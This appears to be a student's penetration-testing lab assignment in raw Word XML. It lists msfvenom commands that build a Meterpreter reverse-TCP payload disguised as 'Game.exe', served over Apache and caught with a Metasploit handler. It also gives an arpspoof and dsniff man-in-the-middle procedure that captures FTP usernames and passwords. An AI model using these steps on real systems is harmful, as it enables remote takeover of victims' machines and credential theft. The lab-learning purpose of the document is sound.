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BFA0A" w14:textId="73852766" w:rsidR="00326EE8" w:rsidRDefault="003069F7" w:rsidP="003069F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASSIGNMENT DAY</w:t>
      </w:r>
      <w:r w:rsidR="00005DBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F99FA89" w14:textId="77777777" w:rsidR="003069F7" w:rsidRDefault="003069F7" w:rsidP="003069F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE457AF" w14:textId="712D1629" w:rsidR="003069F7" w:rsidRDefault="003069F7" w:rsidP="003069F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003069F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Question1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B80C2B" w14:textId="153D58C6" w:rsidR="003069F7" w:rsidRPr="003069F7" w:rsidRDefault="003069F7" w:rsidP="003069F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thick"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create a payload for windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D83589A" w14:textId="6F418B70" w:rsidR="003069F7" w:rsidRPr="003069F7" w:rsidRDefault="003069F7" w:rsidP="003069F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thick"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003069F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploit the victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="003069F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408F3C6D" w14:textId="5D5A6595" w:rsidR="003069F7" w:rsidRDefault="003069F7" w:rsidP="003069F7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF7E662" w14:textId="7C65C5D2" w:rsidR="003069F7" w:rsidRDefault="003069F7" w:rsidP="003069F7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67630811" wp14:editId="21D0C4A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8D9" w14:textId="06BD0074" w:rsidR="003069F7" w:rsidRPr="003069F7" w:rsidRDefault="003069F7" w:rsidP="003069F7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40BC908F" wp14:editId="1803B4B0">
            <wp:extent cx="5731510" cy="2743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B7FD" w14:textId="2CD50122" w:rsidR="003069F7" w:rsidRDefault="003069F7" w:rsidP="003069F7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003069F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029932CC" w14:textId="42993CDD" w:rsidR="003069F7" w:rsidRDefault="003069F7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.Open kali and open the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC0D570" w14:textId="20430A9C" w:rsidR="003069F7" w:rsidRDefault="003069F7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.type sudo su - , and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FAC941" w14:textId="5B2870E8" w:rsidR="003069F7" w:rsidRDefault="003069F7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.type systemctl enable ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398067E5" w14:textId="352024FD" w:rsidR="003069F7" w:rsidRDefault="003069F7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.type systemctl start ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D37CADD" w14:textId="4F5D823C" w:rsidR="003069F7" w:rsidRDefault="003069F7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5.</w:t>
      </w:r>
      <w:r w:rsidR="00D662DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open git bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515A2903" w14:textId="2705BEA7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6.type ssh bpg@ipaddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226FC7B7" w14:textId="2BCA0A71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7.type sudo su – and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FF540A" w14:textId="51EDF19C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8.install apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305AC7D0" w14:textId="0D5C9455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9.create a webserver using cd /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B34909" w14:textId="04AC0E16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0.type mkdir &lt;name of the file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A50FC6" w14:textId="53712A7B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11.type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D662DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;Ip address of kali </w:t>
      </w:r>
      <w:r w:rsidRPr="00D662DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f exe&gt; /var/www/html/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name of file</w:t>
      </w:r>
      <w:r w:rsidRPr="00D662DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/Game.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01225224" w14:textId="241E41C7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2.type systemctl enable apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CE325B" w14:textId="3EDD2033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3.type systemctl start apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44292423" w14:textId="43515F6B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4.type cd ~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220CD970" w14:textId="06F386D0" w:rsidR="00D662DA" w:rsidRDefault="00D662DA" w:rsidP="003069F7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5.type ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD65AF6" w14:textId="47879A60" w:rsidR="00D662DA" w:rsidRDefault="00D662DA" w:rsidP="00D662DA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6.for creating a text document type touch a.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383A3349" w14:textId="19391A6B" w:rsidR="00D662DA" w:rsidRDefault="00D662DA" w:rsidP="00D662DA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7.type msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB739F6" w14:textId="48D280A1" w:rsidR="00D662DA" w:rsidRDefault="00D662DA" w:rsidP="00D662DA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8.type use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9D6A71" w14:textId="600F74D2" w:rsidR="00D662DA" w:rsidRDefault="00D662DA" w:rsidP="00D662DA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19.type show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C018051" w14:textId="709EB456" w:rsidR="00D662DA" w:rsidRDefault="00D662DA" w:rsidP="00D662DA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0.if you don’t see your LHOST ip address then type set LHOST ip address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1379310B" w14:textId="7594DED6" w:rsidR="00D662DA" w:rsidRDefault="00D662DA" w:rsidP="00D662DA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1.</w:t>
      </w:r>
      <w:r w:rsidR="00005DBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36748A52" w14:textId="43947403" w:rsidR="00005DBB" w:rsidRDefault="00005DBB" w:rsidP="00005DBB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2.type sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C2F779" w14:textId="7D1DA514" w:rsidR="00D662DA" w:rsidRDefault="00005DBB" w:rsidP="00D662DA">
      <w:pPr>
        <w:ind w:left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3.after all of this you can download,upload ,taking screenshots are done by your kali using commands upload file name,download file name,shell,get -children -recurse |get -content …..etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552F8EF" w14:textId="0B24CEA8" w:rsidR="00005DBB" w:rsidRDefault="00005DBB" w:rsidP="00D662DA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E18B0D1" w14:textId="3443F4BA" w:rsidR="00005DBB" w:rsidRDefault="00005DBB" w:rsidP="00D662DA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E106341" w14:textId="7F912798" w:rsidR="00005DBB" w:rsidRDefault="00005DBB" w:rsidP="00D662DA">
      <w:pPr>
        <w:ind w:left="720"/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Question2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA8EF45" w14:textId="424F59FA" w:rsidR="00005DBB" w:rsidRDefault="00005DBB" w:rsidP="00005DBB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reate an FTP server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793BA834" w14:textId="563A14CF" w:rsidR="00005DBB" w:rsidRDefault="00005DBB" w:rsidP="00005DBB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ccess FTP server from windows cmd prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3D38C5" w14:textId="29DE27B5" w:rsidR="00005DBB" w:rsidRDefault="00005DBB" w:rsidP="00005DBB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005DBB">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Do an mitm and username and password of FTP transaction using wireshark and dsniff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA626C4" w14:textId="202ED11C" w:rsidR="00005DBB" w:rsidRPr="00005DBB" w:rsidRDefault="00005DBB" w:rsidP="00005DBB">
      <w:pPr>
        <w:ind w:left="72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2C61027" wp14:editId="17F0A3F4">
            <wp:extent cx="5731510" cy="2667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831" w14:textId="05CE93FF" w:rsidR="003069F7" w:rsidRDefault="00005DBB" w:rsidP="003069F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BB8FA49" wp14:editId="3D77A3C7">
            <wp:extent cx="5731510" cy="30003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54A2" w14:textId="56455EFA" w:rsidR="00005DBB" w:rsidRDefault="00005DBB" w:rsidP="003069F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CC732B2" wp14:editId="57FBD772">
            <wp:extent cx="5731510" cy="45573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7E74" w14:textId="3913AC0C" w:rsidR="00005DBB" w:rsidRDefault="00005DBB" w:rsidP="003069F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BC19BC" w14:textId="2519081E" w:rsidR="00005DBB" w:rsidRDefault="00005DBB" w:rsidP="003069F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B0A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Steps</w:t>
      </w:r>
      <w:r w:rsidR="003B0A7A" w:rsidRPr="003B0A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C592846" w14:textId="7AA64E42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.Open 3 virtual machines pentester ,victim,and kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59153B4D" w14:textId="1F6588CA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2.launch all of them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153D6F8C" w14:textId="2A24B5DB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.open the victim machine and goto server manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C627503" w14:textId="7D1411D0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4.goto manage and goto roles and features </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FC583F" w14:textId="7D11AB84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5.goto webserver(IIS) and tick it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EDE403" w14:textId="472FC6B8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6.tick on FTP server ,FTP service ,and FTP extensibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE76301" w14:textId="04C7314D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7.Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7734A1" w14:textId="77777777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8.After installation goto tools and goto Internet Information Services Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581E42A0" w14:textId="77777777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9.right click on winserver </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BF143E" w14:textId="77777777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0.Add FTP site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F1A50A" w14:textId="77777777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11.Name it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25928990" w14:textId="77777777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2.Click on physical path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529448AF" w14:textId="77777777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3.Browse it to FTP root and click on next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BAFDDC" w14:textId="5FCD17A8" w:rsidR="003B0A7A" w:rsidRDefault="003B0A7A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4.tick on port 21,No SSL,</w:t>
      </w:r>
      <w:r w:rsidR="00825F70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Basic,</w:t>
      </w:r>
      <w:r w:rsidR="00825F70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All users,</w:t>
      </w:r>
      <w:r w:rsidR="00825F70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> read and write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1173DA" w14:textId="7193E275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5.Click on finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51639F8F" w14:textId="40AE577D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6.Goto computer management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5F248F" w14:textId="7A658502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7.Goto local users and groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ACA0DA" w14:textId="7F6279C0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8.Goto system tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE5A5D2" w14:textId="7F14D278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9.users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDB3B74" w14:textId="14D8833D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0.user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512F66C5" w14:textId="2860F0DD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1.set password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0508F5" w14:textId="2CD5C79E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22.after that goto pentester </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2057D529" w14:textId="1849D7A3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23.open pentester and open the cmd prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E24E32" w14:textId="0CC02CD2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4.type ftp&lt;ip address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43841D33" w14:textId="4CE34871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5.type username and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465F02CC" w14:textId="18880070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6.open kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34857532" w14:textId="7BF358C8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7.root it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A1F641" w14:textId="678D7678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8.type in the shell nmap -Pn  -sS -f ipaddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3906D813" w14:textId="765E0E07" w:rsidR="00825F70" w:rsidRDefault="00825F70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29.install dsniff using </w:t>
      </w:r>
      <w:r w:rsidR="002924FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the command apt install dsniff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114D291E" w14:textId="661C7DF2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0.type echo 1 &gt; /proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E189C08" w14:textId="07EDFD4A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1.type systemctl -w net ipv4 ip_forward=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0C83FC" w14:textId="3D6F131F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2.type nmap -Pn -sS -f ipaddress.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E22979B" w14:textId="640FAEB1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3.type arpspoof -i eth0 -t ipaddress -r ipaddress of client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AD971D" w14:textId="68344E68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4.type dsniff -i eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B0E996" w14:textId="4759C46A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5.open wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D0E6D4" w14:textId="3187A93F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6.start sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C74B32C" w14:textId="6BCD33B6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7.when the client type the password and username we can see it in our kali shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45BFD5" w14:textId="4B8CB1F8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38.open wire shark goto eth0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55653109" w14:textId="641C04AB" w:rsidR="002924FD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9.filterout the packages that is related to our tcp.and take port no.21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EBFD2C" w14:textId="7E08F907" w:rsidR="002924FD" w:rsidRPr="003B0A7A" w:rsidRDefault="002924FD" w:rsidP="003069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0.we can see the password and username there.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002924FD" w:rsidRPr="003B0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F667D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E303F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C1389"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39362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A4396"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E13C50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F7"/>
    <w:rsid w:val="00005DBB"/>
    <w:rsid w:val="002924FD"/>
    <w:rsid w:val="003069F7"/>
    <w:rsid w:val="00326EE8"/>
    <w:rsid w:val="003B0A7A"/>
    <w:rsid w:val="00825F70"/>
    <w:rsid w:val="00D6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8E6F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{93929B25-2B13-4D16-B2FE-5A05F163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9F7"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0030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2306-03D5-4C18-B545-1BD4BC3B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afsal</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>karim afsal</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-01T10:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-01T11:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>